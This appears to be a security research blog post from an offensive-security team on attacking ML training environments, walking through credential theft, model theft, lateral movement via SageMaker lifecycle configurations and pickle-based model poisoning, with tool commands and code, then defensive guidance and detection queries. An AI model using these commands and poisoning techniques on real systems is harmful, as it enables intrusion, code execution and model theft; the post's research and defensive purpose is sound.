Becoming the trainer: Attacking ML training infrastructure

17 June 2025

Authors

Brett Hawkins

Adversary Simulation

IBM X-Force Red

Artificial intelligence (AI) is quickly becoming a strategic investment for companies of all sizes and industries, such as automotive, healthcare and financial services. To fulfill this rapidly developing business need, machine learning (ML) models need to be developed and deployed to support these AI-integrated products and services via the machine learning operations (MLOps) lifecycle. The most critical phase within the MLOps lifecycle is when the model is being trained within an ML training environment. If an attacker were to gain unauthorized access to any components within the ML training environment, this could affect the confidentiality, integrity and availability of the models being developed.

This research includes a background on ML training environments and infrastructure, along with detailing different attack scenarios against the various critical components, such as Jupyter notebook environments, cloud compute, model artifact storage and model registries. This blog will outline how to take advantage of the integrations between these various components to facilitate privilege escalation and lateral movement, as well as how to conduct ML model theft and poisoning. In addition to showing these attack scenarios, this blog will describe how to protect and defend these ML training environments.

Background

Prior work

The resources below are prior work related to this research. For each piece of prior work, we describe how this X-Force Red research differs from or builds upon it.

Model theft and training data theft from MLOps platforms

Chris Thompson and I (Brett Hawkins) released a whitepaper in January 2025, which included how to perform model and training data theft against Azure ML, BigML and Vertex AI model registries. This new X-Force Red research differs as it focuses on how to perform model theft attacks against Amazon SageMaker and MLFlow, along with how to conduct lateral movement and abuse the integrations between different infrastructure components involved within ML training environments. Additionally, this includes new research on conducting model poisoning attacks against Azure ML and Amazon SageMaker to gain code execution, along with updates to the X-Force Red MLOKit tool to automate these attacks.

Abuse of SageMaker notebook lifecycle configurations

Or Azarzar released a blog post that showed how to abuse SageMaker notebook instance lifecycle configurations to obtain a reverse shell within a SageMaker cloud compute instance. Or’s research included how to conduct this attack using the AWS web interface. This new X-Force Red research details how to conduct this same attack in an automated method via a new module in the X-Force Red MLOKit tool.


Machine learning technology use cases

Machine Learning (ML) is used in multiple industries as part of key business products and service offerings. Example use cases for various industries are listed below:

Automotive industry

  • Autonomous vehicles
  • Driver assistance systems
  • Manufacturing operations

Healthcare industry

  • Medical imaging analysis
  • Drug discovery and development
  • Healthcare data management

Financial services industry

  • Commodity trading futures
  • Fraud detection
  • Insurance claim management

Machine learning operations lifecycle

To develop and deploy ML models that are utilized by the ML technologies previously mentioned, the Machine Learning Operations (MLOps) lifecycle is used. MLOps is the practice of deploying and maintaining ML models in a secure, efficient and reliable way. The goal of MLOps is to provide a consistent and automated process to be able to rapidly get an ML model into production for use by ML technologies.

An MLOps lifecycle exists for an ML model to go from design all the way to deployment. For a list of popular open source and commercial MLOps platforms, see this resource. In this research, we will focus on attacking and protecting the ML training environment that is involved in the “Develop/Build” phase of the MLOps lifecycle.

The attack scenarios that will be shown in this research against ML training environments rely on obtaining valid credential material. Common sources for the credential material required to access ML training environments include, but are not limited to, file shares, intranet sites (e.g., internal wikis), user workstations, public resources (e.g., GitHub), social engineering, public data breach leaks or unauthenticated access. Additionally, attackers will utilize various privilege escalation techniques within corporate networks, such as escalating privileges in Active Directory or cloud environments, to help facilitate the retrieval of credentials.

ML training environment infrastructure

There are several key pieces of infrastructure involved in an ML training environment. These include:

  • Jupyter Notebook environment – This allows data scientists and other MLOps personnel (e.g., ML Engineers) to run ML training experiments, along with other MLOps tasks. The training code runs within this environment and typically resides in a source code management system.
  • Cloud compute – Infrastructure that can be spun up on demand to perform ML training. Jupyter notebooks will run the ML training code using cloud compute, such as within Azure, Amazon Web Services (AWS) or Google Cloud, for example.
  • Model artifact storage – Includes output artifacts from each ML training experiment run, which contain model weights, metadata and model files.
  • Model registry – Allows a single place to track and version models that can be deployed to production. Typically, the model registry contains the best-performing model(s) from the training process.

Some of the specific infrastructure components that will be shown or mentioned in this research include Azure ML, Amazon SageMaker, MLFlow, Amazon S3 and Azure DevOps.

Attacking ML training environments

Key components—Attacker perspective

There are several components included within ML training environments that can be targeted by an attacker. These components are highly privileged and can provide an attacker with sensitive access that would facilitate lateral movement, privilege escalation, training data and model theft or manipulation.

  • Jupyter notebooks – Notebooks can contain credentials, which are used to connect to third-party services and APIs. Other types of useful information for an attacker can be the discovery of model tracking servers that are accessed from this notebook.
  • Cloud compute instances – Systems that run the ML training code can contain sensitive environment variables, which could be leveraged for privilege escalation or lateral movement. Additionally, these cloud compute instances can contain the ML training code that has been cloned from a source code management system.
  • Model artifact storage – Artifact storage data lakes will contain the output created from the ML training process, which can contain sensitive data such as the fully trained model and model weights being used.
  • Model registry – Model registries can be useful to an attacker as they store the information on the best-performing models, including the model metadata. This can assist an attacker in targeting a model for theft or poisoning.

Attack scenarios

Several attack scenarios that involve attacking ML training environments are detailed below. These scenarios have been performed by me and others on our team as part of Adversary Simulation engagements for our clients.

  • Scenario 1: MLFlow - Initial Access via Jupyter Notebook environment
  • Scenario 2: MLFlow - Model theft from model registry
  • Scenario 3: SageMaker - Lateral movement from SCM system to cloud compute
  • Scenario 4: SageMaker - Lateral movement to cloud compute using malicious lifecycle configuration
  • Scenario 5: SageMaker - Model theft from model registry
  • Scenario 6: SageMaker - Model poisoning to gain code execution
  • Scenario 7: Azure ML - Model poisoning to gain code execution

Scenario 1: MLFlow - Initial access via Jupyter Notebook environment

In this attack scenario, an attacker has gained initial access to an organization via a phishing attack and escalated their privileges within the Active Directory environment. Using their elevated privileges, the attacker has performed lateral movement to a data scientist workstation and obtained their Azure ML credentials from the workstation.

After obtaining initial access, the compromised data scientist credentials can be used to log in to Azure ML, where there is a Jupyter notebook available and configured to send ML training model artifacts to MLFlow.

In this case, the data scientist has the credentials to MLFlow present in cleartext within the Jupyter notebook. Therefore, these credentials can be stolen from this Jupyter notebook.

These MLFlow credentials from the Jupyter notebook can then be used to gain initial access to the MLFlow tracking server.
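
As an illustration, the hypothetical notebook cell below shows the kind of cleartext MLFlow credential material an attacker looks for; the tracking URI, username and password are made-up values, and the environment variables are the standard ones MLFlow reads when a tracking server uses basic authentication.

import os
import mlflow

# Hypothetical notebook cell of the kind an attacker searches for:
# MLFlow tracking credentials hardcoded in cleartext.
os.environ["MLFLOW_TRACKING_USERNAME"] = "svc-mlflow"        # cleartext username
os.environ["MLFLOW_TRACKING_PASSWORD"] = "SuperSecret123!"   # cleartext password

mlflow.set_tracking_uri("https://mlflow.internal.example.com")
mlflow.set_experiment("fraud-detection-training")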

Scenario 2: MLFlow - Model theft from model registry

After gaining initial access to an MLFlow tracking server, as shown in the previous attack scenario, the MLFlow REST API can be abused to perform model theft from the MLFlow model registry. This can also be conducted in an automated fashion using MLOKit. First, reconnaissance of the available models within the MLFlow model registry can be conducted using the command below.

MLOKit.exe list-models /platform:mlflow /credential:username;password /url:[MLFLOW_URL]

Then, a given model can be downloaded from the model registry by the model ID (model name in this case). This will download all associated model artifacts for a model.

MLOKit.exe download-model /platform:mlflow /credential:username;password /url:[MLFLOW_URL] /model-id:[MODEL_ID]

This demonstrates performing model theft from an MLFlow model registry after stealing credentials from a Jupyter notebook within Azure ML.
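
Under the hood, this activity is a series of MLFlow REST API calls. The hedged Python sketch below approximates the reconnaissance and artifact download steps; the endpoint paths match the log entries referenced in the detection guidance later in this post, while the server URL, artifact path and run ID are illustrative.

import requests

MLFLOW_URL = "https://mlflow.example.com"        # hypothetical tracking server
AUTH = ("stolen_username", "stolen_password")    # credentials taken from the notebook

# Model reconnaissance: enumerate registered model versions
resp = requests.get(
    f"{MLFLOW_URL}/api/2.0/mlflow/model-versions/search",
    params={"max_results": 100},
    auth=AUTH,
)
for mv in resp.json().get("model_versions", []):
    print(mv["name"], mv["version"], mv.get("run_id"))

# Model theft: download an individual artifact for a chosen run
artifact = requests.get(
    f"{MLFLOW_URL}/get-artifact",
    params={"path": "model/model.pkl", "run_uuid": "<RUN_ID>"},  # illustrative values
    auth=AUTH,
)
with open("model.pkl", "wb") as f:
    f.write(artifact.content)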

If model artifacts are stolen, an attacker can take advantage of these artifacts in the following ways:

  • Intellectual property theft - Attackers can steal proprietary algorithms, architecture, and training strategies embedded in the model
  • Model extraction & replication - Attackers can replicate or fine-tune the stolen model to build competing systems or reduce their own development costs
  • Adversarial attacks and evasion - Knowledge of the model enables crafting inputs that trick or bypass it, especially in security-critical applications such as fraud detection or malware classification
  • Backdooring - The model can be maliciously altered with hidden behaviors and redistributed for downstream abuse
  • Compromise of system security - Embedded secrets or passwords can be used to attack any integrated systems
  • Competitive intelligence & strategy analysis - Analysis of the model can reveal business logic, user focus, and strategic intentions

Scenario 3: SageMaker - Lateral movement from SCM system to cloud compute

In this attack scenario, an attacker has gained initial access to an organization via a phishing attack. From there, the attacker has performed internal reconnaissance and discovered a personal access token (PAT) for the organization’s Azure DevOps instance on a file share.

A stolen PAT for Azure DevOps can be used to perform reconnaissance of the available repositories and search for repositories that have MLFlow project files. This can be conducted with a tool such as ADOKit.

ADOKit.exe searchfile /credential:PAT /url:https://dev.azure.com/organizationName /search:MLproject

After a repository is discovered, it can be cloned using the stolen PAT.

The code within one of the MLFlow project files in one of the repositories can be modified to provide a reverse shell when executed within the ML training environment, which is SageMaker in this instance. As an alternative to modifying the MLProject file, any script file the project runs can be modified, such as a Python training script; a hedged illustration of this kind of modification is shown below.
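
The snippet below sketches what such a change to a training script referenced by the project file might look like. The function names are made up, and the payload is a harmless placeholder command rather than an actual reverse shell.

import subprocess

def attacker_payload():
    # Placeholder command; in the attack described above this would instead
    # launch a callback to attacker-controlled infrastructure.
    subprocess.run("id", shell=True, check=False)

def train():
    # ... the legitimate ML training code continues to run so the change goes unnoticed ...
    pass

if __name__ == "__main__":
    attacker_payload()
    train()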

It is common for automation to be set up in an MLOps training environment to pull updated code from the affected SCM repository and run it. Another option could be MLOps personnel pulling in code changes on an ad-hoc or regularly scheduled basis. In either of these scenarios, the updated MLProject file would be pulled in and its malicious commands would run, as demonstrated below.

This causes the reverse shell command to be run on the SageMaker compute instance, which provides direct access to the system.

While on the cloud compute system, access to sensitive credentials can be obtained via environment variables, which frequently include the credentials to other ML training infrastructure, such as an MLFlow tracking server or enterprise data lakes. Other data that can reside on the SageMaker compute instance includes third-party API credentials or even training data.

Scenario 4: SageMaker - Lateral movement to cloud compute using malicious lifecycle configuration

This example scenario starts with an attacker discovering AWS security credentials within a public GitHub account for an organization. From there, MLOKit can be used to access the organization’s AWS environment using the stolen credentials. To perform this attack, the stolen AWS security credentials will need the permissions granted by the AmazonSageMakerFullAccess AWS managed policy, which means the credentials need administrative access to SageMaker. These are the minimum privileges required.

The MLOKit command below can be run to list all notebook instances available within SageMaker.

MLOKit.exe list-notebooks /platform:sagemaker /credential:[ACCESS_KEY;SECRET_KEY] /region:[REGION]

After identifying a notebook instance where code execution is desired, the command below can be run. This will stop the target notebook, create a lifecycle configuration based on the script you provide, assign the lifecycle configuration to the target notebook and finally restart the target notebook. The bash script file, in this instance, is a reverse shell.

MLOKit.exe add-notebook-trigger /platform:sagemaker /credential:[ACCESS_KEY;SECRET_KEY] /notebook-name:[NOTEBOOK_NAME] /script:[PATH_TO_SCRIPT] /region:[REGION]
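
For reference, the sequence MLOKit automates here is roughly equivalent to the boto3 calls sketched below. The notebook instance and lifecycle configuration names are hypothetical, and the OnStart script is a harmless placeholder rather than a reverse shell.

import base64
import boto3

sm = boto3.client("sagemaker", region_name="us-east-1")
notebook = "target-notebook"                                    # hypothetical instance name
onstart_script = "#!/bin/bash\nid > /tmp/lifecycle_poc.txt\n"   # placeholder script

# 1. Stop the target notebook instance (it must be stopped before it can be updated)
sm.stop_notebook_instance(NotebookInstanceName=notebook)
# ... wait for the instance to reach the 'Stopped' state ...

# 2. Create a lifecycle configuration whose OnStart hook contains the base64-encoded script
sm.create_notebook_instance_lifecycle_config(
    NotebookInstanceLifecycleConfigName="attacker-lifecycle-config",
    OnStart=[{"Content": base64.b64encode(onstart_script.encode()).decode()}],
)

# 3. Assign the lifecycle configuration to the target notebook instance
sm.update_notebook_instance(
    NotebookInstanceName=notebook,
    LifecycleConfigName="attacker-lifecycle-config",
)

# 4. Start the notebook so the OnStart script executes
sm.start_notebook_instance(NotebookInstanceName=notebook)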

Upon the target notebook instance starting, it will load the malicious lifecycle configuration that provides a reverse shell to the SageMaker cloud compute instance as the root user account.

As mentioned in the previous attack path, access to SageMaker cloud compute can facilitate the discovery of sensitive credentials via environment variables and script files, or proprietary ML training code and data.

Scenario 5: SageMaker - Model theft from model registry

This example scenario starts with an attacker discovering AWS security credentials within a public GitLab account for an organization. To perform this attack, the stolen AWS security credentials will need the permissions granted by the AmazonS3ReadOnlyAccess and AmazonSageMakerReadOnly AWS managed policies, which means the credentials need read-only access to SageMaker and S3. These are the minimum privileges required.

MLOKit can be used to list all models that are available within the SageMaker model registry after authenticating with the stolen AWS security credentials.

MLOKit.exe list-models /platform:sagemaker /credential:[ACCESS_KEY;SECRET_KEY] /region:[REGION]

Supply a model name from the previous MLOKit command as the /model-id: argument. This will locate and download all model artifacts for the registered model.

MLOKit.exe download-model /platform:sagemaker /credential:[ACCESS_KEY;SECRET_KEY] /model-id:[MODEL_ID] /region:[REGION]

At this point, all model artifacts have been downloaded and can be extracted locally.
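
For reference, the reconnaissance and download flow that MLOKit automates here maps roughly to the boto3 calls sketched below; the model name is hypothetical, and the sketch assumes the artifact location is exposed through the model's PrimaryContainer ModelDataUrl field.

import boto3

sm = boto3.client("sagemaker", region_name="us-east-1")
s3 = boto3.client("s3", region_name="us-east-1")

# Model reconnaissance: enumerate models registered in SageMaker
for model in sm.list_models()["Models"]:
    print(model["ModelName"])

# Locate the artifact location (an S3 URI such as s3://bucket/prefix/model.tar.gz)
details = sm.describe_model(ModelName="target-model")   # hypothetical model name
model_data_url = details["PrimaryContainer"]["ModelDataUrl"]

# Model theft: download the packaged artifacts from S3
bucket, key = model_data_url.removeprefix("s3://").split("/", 1)
s3.download_file(bucket, key, "model.tar.gz")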

Scenario 6: SageMaker - Model poisoning to gain code execution

In this scenario, we will be poisoning the previously stolen model from SageMaker. To perform this attack, the compromised AWS security credentials will need the permissions granted by the AmazonS3FullAccess and AmazonSageMakerReadOnly AWS managed policies, which means the credentials need read/write access to S3 and read-only access to SageMaker. These are the minimum privileges required.

After extracting the model artifacts, identify any serialized model formats that support code execution upon loading. In this example, we discover that the stolen model uses Pickle-based model files and take note of one of the model.pkl files. The model.pkl file will be the one poisoned to include a malicious command, such as a reverse shell.

To poison the serialized model file (model.pkl), a Python code snippet can be used; a hedged illustration is shown after this paragraph. An alternative approach is appending the reverse shell to an existing model, rather than completely replacing the model. This is just a simple proof of concept. When conducting this attack as part of a security assessment, it is recommended to perform it in a non-production environment to reduce business impact while still testing security controls against the poisoning of models within SageMaker. Other tools are also available for creating malicious model files.
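
The snippet below is a benign illustration of why Pickle-based model files support code execution on load, not the author's original snippet: unpickling can be made to call an arbitrary function via __reduce__, and the command used here is a harmless placeholder rather than a reverse shell.

import os
import pickle

class PoisonedModel:
    def __reduce__(self):
        # A real attack would return a reverse shell command here; this placeholder
        # simply writes a proof-of-concept file when the pickle is loaded.
        return (os.system, ("id > /tmp/poisoned_model_poc.txt",))

# Overwrite (or, as noted above, append to) the serialized model file
with open("model.pkl", "wb") as f:
    pickle.dump(PoisonedModel(), f)

# Anything that later loads the file executes the embedded command:
# pickle.load(open("model.pkl", "rb"))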

After adding the malicious reverse shell code to the model.pkl file, MLOKit can be used to upload the poisoned model to the associated model artifact location for a given registered model. First, the poisoned model needs to be packaged up. The 7-zip command below is an example of packaging the poisoned model into a file named model.tar.gz.

"C:\Program Files\7-Zip\7z.exe" a -ttar -so model.tar * | "C:\Program Files\7-Zip\7z.exe" a -si model.tar.gz

After packaging the poisoned model, it can be uploaded to the appropriate model artifact location via MLOKit.

MLOKit.exe poison-model /platform:sagemaker /credential:[ACCESS_KEY;SECRET_KEY] /model-id:[MODEL_ID] /source-dir:[SOURCE_FILES_PATH] /region:[REGION]

Once this model is deployed either within a training or production environment, the poisoned model will run the reverse shell code that will provide an interactive command shell to the model deployment endpoint.

Scenario 7: Azure ML - Model poisoning to gain code execution

This example attack scenario starts with an attacker performing a device code phishing attack against a data scientist. This allows the attacker to obtain an Azure access token as the targeted data scientist user.

With an Azure access token, the Azure ML REST API can be accessed using MLOKit.

MLOKit.exe check /platform:azureml /credential:[ACCESS_TOKEN]

From there, all the available workspaces can be listed for each Azure subscription.

MLOKit.exe list-projects /platform:azureml /subscription-id:[SUBSCRIPTION_ID] /credential:[ACCESS_TOKEN]

After performing workspace reconnaissance, models within each workspace can be listed.

MLOKit.exe list-models /platform:azureml /credential:[ACCESS_TOKEN] /subscription-id:[SUBSCRIPTION_ID] /region:[REGION] /resource-group:[RESOURCE_GROUP] /workspace:[WORKSPACE_NAME]
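
For reference, this model reconnaissance step corresponds to a call against the Azure Resource Manager REST API for Azure ML, similar to the hedged sketch below; the api-version value and placeholder identifiers are illustrative.

import requests

token = "<ACCESS_TOKEN>"
sub, rg, ws = "<SUBSCRIPTION_ID>", "<RESOURCE_GROUP>", "<WORKSPACE_NAME>"

url = (
    "https://management.azure.com"
    f"/subscriptions/{sub}/resourceGroups/{rg}"
    f"/providers/Microsoft.MachineLearningServices/workspaces/{ws}/models"
)
resp = requests.get(
    url,
    headers={"Authorization": f"Bearer {token}"},
    params={"api-version": "2023-04-01"},   # illustrative API version
)
for model in resp.json().get("value", []):
    print(model["name"])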

After performing model reconnaissance, a model can be downloaded from Azure ML using MLOKit by supplying the model ID from the output of the previous command. Within the directory that was created when downloading the model, take note of any serialized model file formats that support code execution upon load. In this case, the registered model is using a Pickle-based model. The model.pkl file will be the file that is poisoned to include a malicious command, such as a reverse shell.

MLOKit.exe download-model /platform:azureml /credential:[ACCESS_TOKEN] /subscription-id:[SUBSCRIPTION_ID] /region:[REGION] /resource-group:[RESOURCE_GROUP] /workspace:[WORKSPACE_NAME] /model-id:[MODEL_ID]

To poison the serialized model file (model.pkl), the same Python code snippet shown in Scenario 6 can be used, which adds a reverse shell to the model.pkl file and then replaces the existing model file. An alternative approach is appending the reverse shell to an existing model, rather than completely replacing the model. This is just a simple proof of concept. When conducting this attack as part of a security assessment, it is recommended to perform it in a non-production environment to reduce business impact while still testing security controls against the poisoning of models within Azure ML.

After adding the malicious reverse shell code to the model.pkl file, MLOKit can be used to upload the poisoned model artifacts to the associated datastore for the model.

MLOKit.exe poison-model /platform:azureml /credential:[ACCESS_TOKEN] /subscription-id:[SUBSCRIPTION_ID] /region:[REGION] /resource-group:[RESOURCE_GROUP] /workspace:[WORKSPACE_NAME] /model-id:[MODEL_ID] /source-dir:[SOURCE_DIRECTORY]

Once this model is deployed either within a training or production environment, the poisoned model will run the reverse shell code that will provide interactive command shell access to the Azure ML deployment endpoint.

If an attacker compromises an Azure ML deployment endpoint, this access can be used for:

  • Unauthorized access and use - Attackers can exploit the endpoint for free compute or overwhelm it, causing service disruption
  • Data exposure - Sensitive input or output data sent through the model can be intercepted or misused
  • Model theft - The attacker may steal or replicate the model through direct access or repeated queries
  • Model tampering – The attacker can replace the deployed model with a malicious version or embed harmful behavior
  • Infrastructure and lateral movement - Compromise may lead to access to other Azure resources via environment variables or credentials

Protecting ML training environments

Defensive guidance will be outlined below to help defend and protect your ML training environment with regard to users, Jupyter notebook environments, cloud compute instances, model artifact storage and model registries.

ML training environment users

Personnel who interact with ML training environments should be classified as business-critical personnel who have highly sensitive access. Due to this, their access should be properly secured, as would any other type of sensitive user, such as a database administrator or Active Directory administrator, for example.

  • Ensure users are using a password management system to store any credentials used to access ML training systems
  • If possible, set up a separate administrative account for users that is only to be used for ML training systems. The credentials for these separate accounts should be managed within a privileged access management system.
  • Add additional monitoring controls to personnel workstations
  • Provide security awareness training on why and how attackers would take advantage of their access
  • Ensure that multi-factor authentication (MFA) is enabled for the users
  • If users are using PATs to access ML training infrastructure, ensure these have expiration dates

Jupyter notebook environment

Several published guides cover securing your Jupyter notebook environment. A summary of the guidance from those resources is:

  • Password-protect Jupyter notebook with a strong password stored within a password manager
  • Enable IP address restricted access so the Jupyter notebook can only be accessed from specific IP address(es)
  • Provide limits to kernel execution times. This will reduce the availability of a notebook environment to an attacker for long-running tasks, such as a reverse shell. This is also useful from a resource perspective to prevent kernel executions that may be consuming excessive resources.
  • Ensure you are using a virtual environment. This will reduce the impact if an attacker compromises a notebook environment.
  • Run the Jupyter notebook as a non-root user account with the minimum permissions required. If an attacker compromises a notebook environment with minimum privileges, the impact will be limited.
  • Ensure there are no cleartext credentials within your Jupyter notebook. Instead, consider pulling credentials from encrypted secret files or secret managers at runtime; see the sketch after this list.
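
As a hedged example of that last recommendation, the notebook cell below resolves MLFlow tracking credentials from Azure Key Vault at runtime instead of hardcoding them; the vault URL and secret names are hypothetical.

import os

import mlflow
from azure.identity import DefaultAzureCredential
from azure.keyvault.secrets import SecretClient

vault = SecretClient(
    vault_url="https://example-vault.vault.azure.net",   # hypothetical Key Vault
    credential=DefaultAzureCredential(),
)

# MLFlow reads these environment variables when the tracking server uses basic auth
os.environ["MLFLOW_TRACKING_USERNAME"] = vault.get_secret("mlflow-username").value
os.environ["MLFLOW_TRACKING_PASSWORD"] = vault.get_secret("mlflow-password").value

mlflow.set_tracking_uri("https://mlflow.internal.example.com")   # no secrets stored in the notebook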

Cloud compute instances

Regardless of your cloud provider, you should consider the below items when configuring your compute instances.

  • Enable an auto-shutdown and auto-start schedule. If a compute instance is no longer needed, then delete it. This will reduce the availability of compute instances to an attacker if they obtain compromised access.
  • Disable any unneeded services, such as SSH, for example. Any services that can be utilized by an attacker for remote access should be limited and heavily monitored for anomalous access and activity.
  • Configure role-based access so that only authorized users have access to the compute instance. Role-based access can be configured within the Identity and Access Management (IAM) functionality of the various cloud providers.

Model artifact storage and registry

Below is high-level guidance for protecting your model artifact storage and registry:

  • Regularly clean up and delete any old model artifacts that are not needed anymore
  • Ensure access controls are enabled to restrict access to the backend storage locations of the model artifacts
  • Add IP address restrictions for who can access the backend storage where the model artifacts reside
  • Enable logging within the backend storage solution and develop detection rules to detect misuse
  • Implement model integrity verification to detect when attempts are made to tamper with a model; see the sketch after this list
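
As a hedged example of the last item, one simple approach to model integrity verification is recording a SHA-256 digest of each artifact when the model is registered and verifying the digests before the model is loaded or deployed. The manifest should be stored outside the artifact storage itself; file and path names below are hypothetical.

import hashlib
import json
from pathlib import Path

def digest(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(8192), b""):
            h.update(chunk)
    return h.hexdigest()

def record_manifest(artifact_dir: str, manifest_file: str = "manifest.json") -> None:
    # Run at model registration time; store the manifest outside the artifact bucket
    manifest = {p.name: digest(p) for p in Path(artifact_dir).glob("*") if p.is_file()}
    Path(manifest_file).write_text(json.dumps(manifest, indent=2))

def verify_manifest(artifact_dir: str, manifest_file: str = "manifest.json") -> bool:
    # Run before deployment; a mismatch indicates the artifacts were tampered with
    manifest = json.loads(Path(manifest_file).read_text())
    return all(
        digest(Path(artifact_dir) / name) == expected
        for name, expected in manifest.items()
    )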

Detection guidance

I have developed KQL queries and CloudTrail queries that can be used to detect the attack scenarios shown in this research against Azure ML and SageMaker, respectively. For MLFlow, I supply filters that can be applied to the gunicorn logs. The below resources can be referenced for configuration guidance of these platforms.

Azure ML – Model poisoning

The KQL query below will query the Azure storage blob logs, Azure ML model and datastore events, and then will join events from these tables by the subscription ID and resource group. The specific operations the query is looking for between these log schemas are:

  • PutBlob
  • GetBlob
  • MICROSOFT.MACHINELEARNINGSERVICES/WORKSPACES/DATASTORES/READ
  • MICROSOFT.MACHINELEARNINGSERVICES/WORKSPACES/Models/READ

This can be indicative of a compromised account being used to download and then replace model artifacts.

AzureMLModelPoisoning.kql

The image below shows the results of the KQL query, which includes the compromised user account, model artifacts that were replaced, and the name of the model and datastore the model artifacts were associated with.

Amazon SageMaker – Model theft

The query below can be used to identify model reconnaissance and theft activities. This query will identify any userIdentity.arn and sourceIpAddress pair that has generated the ListModels, DescribeModel, GetObject and GetBucketVersioning events within a 24-hour period. This can be indicative of an attacker using a compromised account to list all models within SageMaker and then choosing to download one.

SageMakerModelTheft.sql

The image below shows the results from the query that successfully identifies the model theft attack by the compromised data-scientist user account.

Amazon SageMaker – Model poisoning

The query below can be used to identify potential model poisoning activities within SageMaker. This query will identify any userIdentity.arn and sourceIpAddress that performed the ListModels, DescribeModel, GetObject, PutObject and GetBucketVersioning events within a 24-hour period. This can be indicative of an attacker using a compromised account to list all models within SageMaker, download a model, and then upload a new model by replacing model artifacts.

SageMakerModelPoisoning.sql

The image below shows the results from the query that successfully identifies the model poisoning attack by the compromised data-scientist user account.

Amazon SageMaker – Malicious lifecycle configuration

The below query can be used to identify potential abuse of a malicious lifecycle configuration. This query will identify any userIdentity.arn and sourceIpAddress that performed the ListNotebookInstances, UpdateNotebookInstance, CreateNotebookInstanceLifecycleConfig, StopNotebookInstance and StartNotebookInstance events within a 24-hour period. This can be indicative of an attacker creating a malicious lifecycle configuration to be assigned to a SageMaker notebook instance.

SageMakerMaliciousLifecycleConfig.sql

The image below shows the results from the query that successfully identifies the abuse of a notebook lifecycle config by the compromised data-scientist user account.

MLFlow

To ensure proper logging is in place to detect abuse of the MLFlow REST API, add the additional options below when starting your MLFlow tracking server.

--gunicorn-opts "--log-level info --access-logfile access.log --error-logfile error.log --capture-output --enable-stdio-inheritance"

Ensure these logs are being sent to a centralized Security Information and Event Management (SIEM) system where they can be correlated to detect anomalous behavior. Once you have the proper logging, the below search strings can be used to correlate REST API actions with potential misuse.

MLOKit Usage

grep -i mlokit access.log

Model Recon

grep -i /api/2.0/mlflow/model-versions/search access.log

Model Theft

grep -i /get-artifact access.log

Conclusion

ML training environments are quickly becoming populated with highly sensitive and business-critical data, which will be targeted by attackers. As security practitioners, it is vital that we understand these environments and systems so we can protect them. If access to these ML training environments falls into the wrong hands, there can be a significant impact on the businesses and consumers that depend on the products and services that use the models developed in these environments. It is X-Force Red’s goal that this research brings more attention to, and inspires future research on, defending these ML training environments.

Acknowledgements

A special thank you to the below people for giving feedback on this research and providing blog post content review:
